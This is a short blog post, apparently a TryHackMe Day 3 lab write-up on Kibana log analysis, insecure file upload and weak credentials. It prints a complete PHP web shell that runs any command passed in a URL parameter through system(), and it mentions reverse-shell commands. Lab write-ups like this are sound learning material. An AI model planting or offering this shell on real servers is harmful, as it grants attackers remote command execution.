Topic Covered: Log Analysis

Who would know that an RCE is so easy to be done with an insecure file upload huh?

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command'])) 
    {
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html>

Day by day the GUI of elastic's Elastic Stack platform becomes more and more fun to explore!

Day 3 started with learning how to use the Kibana Query Language (KQL) (which is a little similar to the wireshark filtering meaning that the basics are covered) and then how an insecure file upload prompt could result into Cross-Site Scripting and/or Remote code execution (which will be important for later).

Afterwards we were shown some weak credentials (which there was a need down the road on trying to upload the shell onto the server to capture the flag in the assets directory) and honestly these are sadly very common speaking from experience( the private server that builds this site at home has the password of 123456).

With the topic mentioned above covered, we also were shown some basic commands that would be used to create reverse shells.

I did have some issues with the vpn connection to the TryHackMe machine network BUT my laptop is quite old so i bet that was what waas causing the issues.

I can't wait for the release of Day 4's Challenge to release!